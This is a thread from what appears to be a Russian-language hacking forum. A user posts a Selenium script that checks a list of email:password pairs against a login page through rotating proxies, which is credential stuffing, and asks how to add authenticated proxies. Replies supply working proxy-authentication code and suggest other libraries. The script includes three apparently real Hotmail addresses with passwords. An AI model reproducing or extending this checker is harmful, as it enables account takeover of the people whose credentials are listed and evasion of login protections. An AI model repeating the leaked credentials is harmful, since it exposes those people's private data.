• XSS.stack #1 – первый литературный журнал от юзеров форума

Python Selenium

byTehnar

HDD-drive
Пользователь
Регистрация
08.08.2023
Сообщения
32
Реакции
1
Доброго времени суток, при разработке костыля возникли трудности, завис на этапе подключения прокси.
Python:
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.chrome.options import Options as ChromeOptions
from selenium.common.exceptions import NoSuchElementException, TimeoutException, WebDriverException
import random

proxy_list = [
    "http://ip:port:user:password"
]

account_list = [
    "jelleman@hotmail.com:mnstudio4zumba",
    "alfonsotorres20@hotmail.com:america123",
    "helene.melliou@hotmail.com:kryfto"
]

random.shuffle(proxy_list)
random.shuffle(account_list)

for proxy_url, account in zip(proxy_list, account_list):
    login, password = account.split(':')
    try:
        chrome_options = ChromeOptions()
        chrome_options.add_argument('--ignore-certificate-errors')
        chrome_options.add_argument('--disable-web-security')
        chrome_options.add_argument('--no-sandbox')
        chrome_options.add_argument(f'--proxy-server={proxy_url}')
        driver = webdriver.Chrome(options=chrome_options)
        driver.get("https://TARGET.COM/")
        
        username_field = WebDriverWait(driver, 10).until(EC.presence_of_element_located((By.ID, "input_login_id")))
        password_field = WebDriverWait(driver, 10).until(EC.presence_of_element_located((By.ID, "input_password_id")))
        
        username_field.send_keys(login)
        password_field.send_keys(password)
        
        password_field.send_keys(Keys.RETURN)
        
        try:
            error_message = WebDriverWait(driver, 10).until(EC.presence_of_element_located((By.ID, "error-message")))
            print(f"Неверные учетные данные: {login}:{password}")
        except TimeoutException:
            print(f"Успешный вход: {login}:{password}")
    except NoSuchElementException as e:
        print(f"Элемент не найден: {e}")
    except TimeoutException as e:
        print(f"Таймаут ожидания: {e}")
    except WebDriverException as e:
        print(f"Ошибка Selenium WebDriver: {e}")
    except Exception as e:
        print(f"Произошла неожиданная ошибка: {e}")
    finally:
        driver.quit()


Проблема в подключении прокси с авторизацией, не могу понять как подключить http прокси с авторизацией (ip:port:user:password), пробовал несколько библиотек (browsermobproxy, pyproxy и т.п), ниче не катит.
Суть проста - натягивается прокси на chrome, открывается окно с сайтом -> поиск input -> заполнение -> отправляем форму. Все, пока это финальный этап.
Гуру Python, нужна ваша помощь!
Любая информация для меня важна, заранее благодарю
 
HTTP Proxy Authentication with Chromedriver in Selenium

To set up proxy authentication we will generate a special file and upload it to chromedriver dynamically using the following code below. This code configures selenium with chromedriver to use HTTP proxy that requires authentication with user/password pair.
Python:
import os
import zipfile

from selenium import webdriver

PROXY_HOST = '192.168.3.2'  # rotating proxy or host
PROXY_PORT = 8080 # port
PROXY_USER = 'proxy-user' # username
PROXY_PASS = 'proxy-password' # password


manifest_json = """
{
    "version": "1.0.0",
    "manifest_version": 2,
    "name": "Chrome Proxy",
    "permissions": [
        "proxy",
        "tabs",
        "unlimitedStorage",
        "storage",
        "<all_urls>",
        "webRequest",
        "webRequestBlocking"
    ],
    "background": {
        "scripts": ["background.js"]
    },
    "minimum_chrome_version":"22.0.0"
}
"""

background_js = """
var config = {
        mode: "fixed_servers",
        rules: {
        singleProxy: {
            scheme: "http",
            host: "%s",
            port: parseInt(%s)
        },
        bypassList: ["localhost"]
        }
    };

chrome.proxy.settings.set({value: config, scope: "regular"}, function() {});

function callbackFn(details) {
    return {
        authCredentials: {
            username: "%s",
            password: "%s"
        }
    };
}

chrome.webRequest.onAuthRequired.addListener(
            callbackFn,
            {urls: ["<all_urls>"]},
            ['blocking']
);
""" % (PROXY_HOST, PROXY_PORT, PROXY_USER, PROXY_PASS)


def get_chromedriver(use_proxy=False, user_agent=None):
    path = os.path.dirname(os.path.abspath(__file__))
    chrome_options = webdriver.ChromeOptions()
    if use_proxy:
        pluginfile = 'proxy_auth_plugin.zip'

        with zipfile.ZipFile(pluginfile, 'w') as zp:
            zp.writestr("manifest.json", manifest_json)
            zp.writestr("background.js", background_js)
        chrome_options.add_extension(pluginfile)
    if user_agent:
        chrome_options.add_argument('--user-agent=%s' % user_agent)
    driver = webdriver.Chrome(
        os.path.join(path, 'chromedriver'),
        chrome_options=chrome_options)
    return driver

def main():
    driver = get_chromedriver(use_proxy=True)
    #driver.get('https://www.google.com/search?q=my+ip+address')
    driver.get('https://httpbin.org/ip')

if __name__ == '__main__':
    main()

Function get_chromedriver returns configured selenium webdriver that you can use in your application. This code is tested and works just fine.
Read more about onAuthRequired event in Chrome.

You might want to check the other methods by the link
 
HTTP Proxy Authentication with Chromedriver in Selenium

To set up proxy authentication we will generate a special file and upload it to chromedriver dynamically using the following code below. This code configures selenium with chromedriver to use HTTP proxy that requires authentication with user/password pair.
Python:
import os
import zipfile

from selenium import webdriver

PROXY_HOST = '192.168.3.2'  # rotating proxy or host
PROXY_PORT = 8080 # port
PROXY_USER = 'proxy-user' # username
PROXY_PASS = 'proxy-password' # password


manifest_json = """
{
    "version": "1.0.0",
    "manifest_version": 2,
    "name": "Chrome Proxy",
    "permissions": [
        "proxy",
        "tabs",
        "unlimitedStorage",
        "storage",
        "<all_urls>",
        "webRequest",
        "webRequestBlocking"
    ],
    "background": {
        "scripts": ["background.js"]
    },
    "minimum_chrome_version":"22.0.0"
}
"""

background_js = """
var config = {
        mode: "fixed_servers",
        rules: {
        singleProxy: {
            scheme: "http",
            host: "%s",
            port: parseInt(%s)
        },
        bypassList: ["localhost"]
        }
    };

chrome.proxy.settings.set({value: config, scope: "regular"}, function() {});

function callbackFn(details) {
    return {
        authCredentials: {
            username: "%s",
            password: "%s"
        }
    };
}

chrome.webRequest.onAuthRequired.addListener(
            callbackFn,
            {urls: ["<all_urls>"]},
            ['blocking']
);
""" % (PROXY_HOST, PROXY_PORT, PROXY_USER, PROXY_PASS)


def get_chromedriver(use_proxy=False, user_agent=None):
    path = os.path.dirname(os.path.abspath(__file__))
    chrome_options = webdriver.ChromeOptions()
    if use_proxy:
        pluginfile = 'proxy_auth_plugin.zip'

        with zipfile.ZipFile(pluginfile, 'w') as zp:
            zp.writestr("manifest.json", manifest_json)
            zp.writestr("background.js", background_js)
        chrome_options.add_extension(pluginfile)
    if user_agent:
        chrome_options.add_argument('--user-agent=%s' % user_agent)
    driver = webdriver.Chrome(
        os.path.join(path, 'chromedriver'),
        chrome_options=chrome_options)
    return driver

def main():
    driver = get_chromedriver(use_proxy=True)
    #driver.get('https://www.google.com/search?q=my+ip+address')
    driver.get('https://httpbin.org/ip')

if __name__ == '__main__':
    main()

Function get_chromedriver returns configured selenium webdriver that you can use in your application. This code is tested and works just fine.
Read more about onAuthRequired event in Chrome.
Thanks a lot, but the error occurs because I'm using the library version 4.6+ and I don't need to specify the path to chromedriver, it's done automatically. I rewrote the script a bit, but the proxy doesn't connect, the site shows the address of the main machine, but the proxy doesn't...
Can you please see what could be the problem?


Python:
import os
import zipfile

from selenium import webdriver
from selenium.webdriver.chrome.options import Options

PROXY_HOST = '45.128.156.22'  # rotating proxy or host
PROXY_PORT = 12839 # port
PROXY_USER = '*********' # username
PROXY_PASS = '*********' # password


manifest_json = """
{
    "version": "1.0.0",
    "manifest_version": 2,
    "name": "Chrome Proxy",
    "permissions": [
        "proxy",
        "tabs",
        "unlimitedStorage",
        "storage",
        "<all_urls>",
        "webRequest",
        "webRequestBlocking"
    ],
    "background": {
        "scripts": ["background.js"]
    },
    "minimum_chrome_version":"22.0.0"
}
"""

background_js = """
var config = {
        mode: "fixed_servers",
        rules: {
        singleProxy: {
            scheme: "http",
            host: "%s",
            port: parseInt(%s)
        },
        bypassList: ["localhost"]
        }
    };

chrome.proxy.settings.set({value: config, scope: "regular"}, function() {});

function callbackFn(details) {
    return {
        authCredentials: {
            username: "%s",
            password: "%s"
        }
    };
}

chrome.webRequest.onAuthRequired.addListener(
            callbackFn,
            {urls: ["<all_urls>"]},
            ['blocking']
);
""" % (PROXY_HOST, PROXY_PORT, PROXY_USER, PROXY_PASS)


def get_chromedriver(use_proxy=False, user_agent=None):
    path = os.path.dirname(os.path.abspath(__file__))
    chrome_options = webdriver.ChromeOptions()
    if use_proxy:
        pluginfile = 'proxy_auth_plugin.zip'

        with zipfile.ZipFile(pluginfile, 'w') as zp:
            zp.writestr("manifest.json", manifest_json)
            zp.writestr("background.js", background_js)
        chrome_options.add_extension(pluginfile)
    if user_agent:
        chrome_options.add_argument('--user-agent=%s' % user_agent)
    option = webdriver.ChromeOptions()
    driver = webdriver.Chrome(options = option)
    return driver

def main():
    driver = get_chromedriver(use_proxy=True)
    #driver.get('https://www.google.com/search?q=my+ip+address')
    driver.get('https://2ip.io')

if __name__ == '__main__':
    main()
 
Thanks a lot, but the error occurs because I'm using the library version 4.6+ and I don't need to specify the path to chromedriver, it's done automatically. I rewrote the script a bit, but the proxy doesn't connect, the site shows the address of the main machine, but the proxy doesn't...
Can you please see what could be the problem?

Sorry for the late reply, I'm not very familiar with selenium and all it's different forks, so not to set you on a wrong path, I probably shouldn't try to bugfix this, however one obsious thing is that you might be using SOCKS proxy, while this script is configured for HTTP (5th line of the background_js scipt), if you are indeed using the SOCKS proxy, try changing the scheme on that 5th background_js line (however I haven't been able to find if there is support for socks proxies, and I myself can't check, as the script doesnt work in headless mode).
Some other approaches might be:
Using a different library (like the comment above suggests, seleniumwire, or something else)
Wrapping your entire python script in proxy (proxychains, etc.), but that might leak some information and overall probably a bad idea
 
Кроме того, что посоветовали выше, попробуй как-нибудь playwright вместе селениума, там намного всё проще и круче.
 
Кроме того, что посоветовали выше, попробуй как-нибудь playwright вместе селениума, там намного всё проще и круче.
Кстати спасибо что напомнил про playwright. Посмотрел оказывается он и питон поддерживает, почему-то думал что только js.
 
Кстати спасибо что напомнил про playwright. Посмотрел оказывается он и питон поддерживает, почему-то думал что только js.
И питон, и другие языки - обертка над jsовской версией насколько я знаю)
 
Кстати спасибо что напомнил про playwright. Посмотрел оказывается он и питон поддерживает, почему-то думал что только js.
Только не используй его с Docker'ом, он полностью не закрывается и у него со временем накапливаются зомби процессы которые все ломают.
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх